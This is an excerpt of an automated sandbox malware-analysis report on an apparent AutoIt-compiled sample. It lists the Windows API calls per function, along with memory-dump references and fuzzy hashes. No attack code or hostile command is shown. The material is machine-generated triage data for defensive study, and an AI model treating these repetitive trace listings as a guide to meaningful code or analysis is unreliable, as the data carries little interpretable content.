                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$CloseHandle$FileType
                                                                                                                                                                • String ID: I,
                                                                                                                                                                • API String ID: 604914513-4149349427
                                                                                                                                                                • Opcode ID: 342ddaa4467cc78fe42fa38a8b4372381ed81e24b51f11371b8c0fbca23ea4e4
                                                                                                                                                                • Instruction ID: bbab3440f80c9141f63b358acb6b87d4931908f4c1833294deae3844797e2875
                                                                                                                                                                • Opcode Fuzzy Hash: 342ddaa4467cc78fe42fa38a8b4372381ed81e24b51f11371b8c0fbca23ea4e4
                                                                                                                                                                • Instruction Fuzzy Hash: A42257319A01869FEF258F6ACC41BAD7B61EB01310FA44229E59CAB2E1CF758C70CB51

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002D07EC
                                                                                                                                                                  • Part of subcall function 002D07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 002D07F4
                                                                                                                                                                  • Part of subcall function 002D07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002D07FF
                                                                                                                                                                  • Part of subcall function 002D07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002D080A
                                                                                                                                                                  • Part of subcall function 002D07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 002D0812
                                                                                                                                                                  • Part of subcall function 002D07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 002D081A
                                                                                                                                                                  • Part of subcall function 002CFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002BAC6B), ref: 002CFFA7
                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002BAD08
                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 002BAD85
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002F2F56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                • String ID: <w7$\t7$s7
                                                                                                                                                                • API String ID: 1986988660-1455135319
                                                                                                                                                                • Opcode ID: 72621cb5d3af696255360fe4592ed0ece8394d954ce23429799b7fe5c906e395
                                                                                                                                                                • Instruction ID: 2c0b0b85cf07fdb780922401962e9c89667f463a963c6422b0191dc8b316d8fe
                                                                                                                                                                • Opcode Fuzzy Hash: 72621cb5d3af696255360fe4592ed0ece8394d954ce23429799b7fe5c906e395
                                                                                                                                                                • Instruction Fuzzy Hash: 4781BCB89183808ED3BBDF2AAD856657EEDEB49304F10856ED41CCB272EB704495CF91

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1733 2d3459-2d3478 call 2d8b30 call 2d9e3b 1738 2d347e-2d3494 1733->1738 1739 2d3547-2d3557 call 2d3573 1733->1739 1741 2d349a-2d34af DecodePointer 1738->1741 1742 2d3536-2d3546 call 2d33ef 1738->1742 1748 2d3559-2d356e call 2d9fa5 call 2d32cf 1739->1748 1749 2d3582-2d3587 call 2d8b75 1739->1749 1743 2d3525-2d3535 call 2d33ef 1741->1743 1744 2d34b1-2d34be DecodePointer 1741->1744 1742->1739 1743->1742 1747 2d34c1 1744->1747 1752 2d34c4-2d34cc 1747->1752 1762 2d3573-2d3577 1748->1762 1752->1743 1756 2d34ce-2d34d8 EncodePointer 1752->1756 1756->1752 1759 2d34da-2d34dc 1756->1759 1759->1743 1761 2d34de-2d350f DecodePointer EncodePointer DecodePointer * 2 1759->1761 1767 2d3516-2d3523 1761->1767 1768 2d3511-2d3514 1761->1768 1763 2d3579-2d3580 call 2d9fa5 1762->1763 1764 2d3581 1762->1764 1763->1764 1767->1747 1768->1752 1768->1767
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D9E3B: EnterCriticalSection.KERNEL32(002D1003,?,002D9CAC,0000000D), ref: 002D9E66
                                                                                                                                                                • DecodePointer.KERNEL32(0036CB70,0000001C,002D33B2,002D1003,00000001,00000000,?,002D3300,000000FF,?,002D9E5E,00000011,002D1003,?,002D9CAC,0000000D), ref: 002D34A6
                                                                                                                                                                • DecodePointer.KERNEL32(?,002D3300,000000FF,?,002D9E5E,00000011,002D1003,?,002D9CAC,0000000D), ref: 002D34B7
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,002D3300,000000FF,?,002D9E5E,00000011,002D1003,?,002D9CAC,0000000D), ref: 002D34D0
                                                                                                                                                                • DecodePointer.KERNEL32(-00000004,?,002D3300,000000FF,?,002D9E5E,00000011,002D1003,?,002D9CAC,0000000D), ref: 002D34E0
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,002D3300,000000FF,?,002D9E5E,00000011,002D1003,?,002D9CAC,0000000D), ref: 002D34E6
                                                                                                                                                                • DecodePointer.KERNEL32(?,002D3300,000000FF,?,002D9E5E,00000011,002D1003,?,002D9CAC,0000000D), ref: 002D34FC
                                                                                                                                                                • DecodePointer.KERNEL32(?,002D3300,000000FF,?,002D9E5E,00000011,002D1003,?,002D9CAC,0000000D), ref: 002D3507
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$Decode$Encode$CriticalEnterSection
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3368343417-0
                                                                                                                                                                • Opcode ID: 21fb7d220aa9e13f548626f9bd432f8547fc9e03fc04477d7fac838759792463
                                                                                                                                                                • Instruction ID: 1c5ff7a1ed1be2abf888bc43b82c52d7f7306f1db222f246399c1e20e5510726
                                                                                                                                                                • Opcode Fuzzy Hash: 21fb7d220aa9e13f548626f9bd432f8547fc9e03fc04477d7fac838759792463
                                                                                                                                                                • Instruction Fuzzy Hash: A7315871D243069FDF26DFA8EC4679C7BA4BB48311F50402BE518A63A1DBB51EA0CF52

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1770 2c50db-2c514b CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                APIs
                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002C5109
                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002C512A
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 002C513E
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 002C5147
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                • Opcode ID: 26d9ab5f684924b4d67d8686a79dfd21aede94261ad13b3d9c76be28134f563a
                                                                                                                                                                • Instruction ID: bec3334e8d6a01873d3006684e07c12c428a9563129f3b39eedcf8accd9335c2
                                                                                                                                                                • Opcode Fuzzy Hash: 26d9ab5f684924b4d67d8686a79dfd21aede94261ad13b3d9c76be28134f563a
                                                                                                                                                                • Instruction Fuzzy Hash: A0F030746443907EEA3217136C48E672E7DD7C7F10F01042DFE1496271CA712880CAB0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002C57EB
                                                                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00300C5B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: IconLoadNotifyShell_String
                                                                                                                                                                • String ID: Line %d: $AutoIt - $
                                                                                                                                                                • API String ID: 3363329723-1003686775
                                                                                                                                                                • Opcode ID: a2d04be111e0def43a72c416d3454642b6a0634a80c38ff55f3fc87b8a2caa9e
                                                                                                                                                                • Instruction ID: 8e29dcbb57aeb547c7808aa9a1116245b567fb5b1c16887a6fe21b928d321273
                                                                                                                                                                • Opcode Fuzzy Hash: a2d04be111e0def43a72c416d3454642b6a0634a80c38ff55f3fc87b8a2caa9e
                                                                                                                                                                • Instruction Fuzzy Hash: 3C41A171018304AAD326EB60DC46FDF77ECAF45350F000B1EF199921A2DF74A6A9CB92
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109), ref: 002E7F46
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 002E7F4D
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,?,?,?,00000001,?,00000000,00000001,?,?,?,00000000,00000109), ref: 002E7FAB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCreateFileHandleModuleProc
                                                                                                                                                                • String ID: CreateFile2$kernel32.dll
                                                                                                                                                                • API String ID: 2580138172-1988006178
                                                                                                                                                                • Opcode ID: caa61b0ea51a6489d0e597d07337b75185692b0c7f12e5d4efaf3b68444e09d8
                                                                                                                                                                • Instruction ID: 821e5a46eb9187ad277a4d586bcf2079dee5a1d6df5bdbdb206cdc4865a62fc8
                                                                                                                                                                • Opcode Fuzzy Hash: caa61b0ea51a6489d0e597d07337b75185692b0c7f12e5d4efaf3b68444e09d8
                                                                                                                                                                • Instruction Fuzzy Hash: 9C110579A1424AEFDF029FA4DC06AEE7BB5FF08311F004114FE14A62A0DB71DA209F91
                                                                                                                                                                APIs
                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002B52E6
                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002B534A
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 002B5356
                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 002B5360
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1795658109-0
                                                                                                                                                                • Opcode ID: 2fcfba4aacb52245f869cf24f068f988e276e3af9a31285a5b4e1789f20cea58
                                                                                                                                                                • Instruction ID: 110ae7787928ae316d2f09c4d820fc48133a7deb730fb2f7664094b2ebd35100
                                                                                                                                                                • Opcode Fuzzy Hash: 2fcfba4aacb52245f869cf24f068f988e276e3af9a31285a5b4e1789f20cea58
                                                                                                                                                                • Instruction Fuzzy Hash: 8A3106309687469BEB31CF64DC44BF937EC9B01380F6400AAE5269B2E1D7F5A8E5E711
                                                                                                                                                                APIs
                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0031581B
                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00315829
                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315831
                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0031583B
                                                                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315877
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                • Opcode ID: 347de94cde2b346d0637d9e7a9f5afbde9d315ddc27d29539ff8b40d3317ea70
                                                                                                                                                                • Instruction ID: 8360d17227f2c18cdbd11ae65c9f9db2b74236e5e96a811b3d3940eab7416a32
                                                                                                                                                                • Opcode Fuzzy Hash: 347de94cde2b346d0637d9e7a9f5afbde9d315ddc27d29539ff8b40d3317ea70
                                                                                                                                                                • Instruction Fuzzy Hash: AB015739E11A2DDBCF0AAFE5D8889EDBBBCBB4D711F414556E601B2140CB30A590CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002B1275,SwapMouseButtons,00000004,?), ref: 002B12A8
                                                                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002B1275,SwapMouseButtons,00000004,?), ref: 002B12C9
                                                                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,002B1275,SwapMouseButtons,00000004,?), ref: 002B12EB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                                                                • Opcode ID: 460cc777765c6673d00c2d38d2ff07c274b89db8135b87272d8aa134c346e4a1
                                                                                                                                                                • Instruction ID: 50e56bba6d84b01fe4d990b1dc9e0d831c268e99a2089a14468019607c02d904
                                                                                                                                                                • Opcode Fuzzy Hash: 460cc777765c6673d00c2d38d2ff07c274b89db8135b87272d8aa134c346e4a1
                                                                                                                                                                • Instruction Fuzzy Hash: 2D115A75A20218BFDB218FA4DC84EEEBBBCEF05780F504559F905D7110E771AE6097A4
                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?,00000000,?,?), ref: 002E1988
                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,?,?,?,?), ref: 002E199C
                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 002E19A2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FilePointer$ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 142388799-0
                                                                                                                                                                • Opcode ID: cd1ca965f3574546178f1330d9ac6f560ed40aa8653bd7b223172900767124cd
                                                                                                                                                                • Instruction ID: 8d0a4bad11649cc44fc796f66d2172f595885065ef443e37976818f7e3f64085
                                                                                                                                                                • Opcode Fuzzy Hash: cd1ca965f3574546178f1330d9ac6f560ed40aa8653bd7b223172900767124cd
                                                                                                                                                                • Instruction Fuzzy Hash: 0811C832670659ABDB119BA9DC41FEE376DAF42720F500255F520A71D2DBB0EC208B51
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a16aff79a1a3e63d43cfb5050e146946a5807709226cfe81e328f60f4fd43fc7
                                                                                                                                                                • Instruction ID: 524bc8e86dd4e46d4d8307a26c57ebfb6c105f97f9146a3715e1ae8691e35570
                                                                                                                                                                • Opcode Fuzzy Hash: a16aff79a1a3e63d43cfb5050e146946a5807709226cfe81e328f60f4fd43fc7
                                                                                                                                                                • Instruction Fuzzy Hash: E4F16A706083119FC715EF28D484A6ABBE5FF89314F54892EF8999B352DB30E945CF82
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002C56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002C57EB
                                                                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 002C5BAD
                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002C5BBC
                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00300D7C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3500052701-0
                                                                                                                                                                • Opcode ID: 66e9b0c16161b739868461c9508c0797576a36f9a3616946d08c4850f554a356
                                                                                                                                                                • Instruction ID: 8a33f0ea6a0fa82458c1f1bedc46d6885048f2800821053ff7bcfd623ab45d95
                                                                                                                                                                • Opcode Fuzzy Hash: 66e9b0c16161b739868461c9508c0797576a36f9a3616946d08c4850f554a356
                                                                                                                                                                • Instruction Fuzzy Hash: 2421D070905B94AFE7738B648895FEABFECAB01308F00058DE69A56281C7747DC5DB51
                                                                                                                                                                APIs
                                                                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00300375
                                                                                                                                                                  • Part of subcall function 002D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C2A58,?,00008000), ref: 002D02A4
                                                                                                                                                                  • Part of subcall function 002D09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002D09E4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                • String ID: X
                                                                                                                                                                • API String ID: 779396738-3081909835
                                                                                                                                                                • Opcode ID: da814fedfed579e5b6a5f10ea070f0b4d75908ef372ccf2fdacd763c309dd2f3
                                                                                                                                                                • Instruction ID: 1fbbbbcf1e7766c9d8f4e64f59f58aa1db4d46d7b92228a7c02415ae85cad177
                                                                                                                                                                • Opcode Fuzzy Hash: da814fedfed579e5b6a5f10ea070f0b4d75908ef372ccf2fdacd763c309dd2f3
                                                                                                                                                                • Instruction Fuzzy Hash: CA21C375A202889BCF02DF94C845BEE7BFC9F49304F00805AE408B7241DBF55A98CFA2
                                                                                                                                                                APIs
                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002C5A9E
                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002C5ABB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
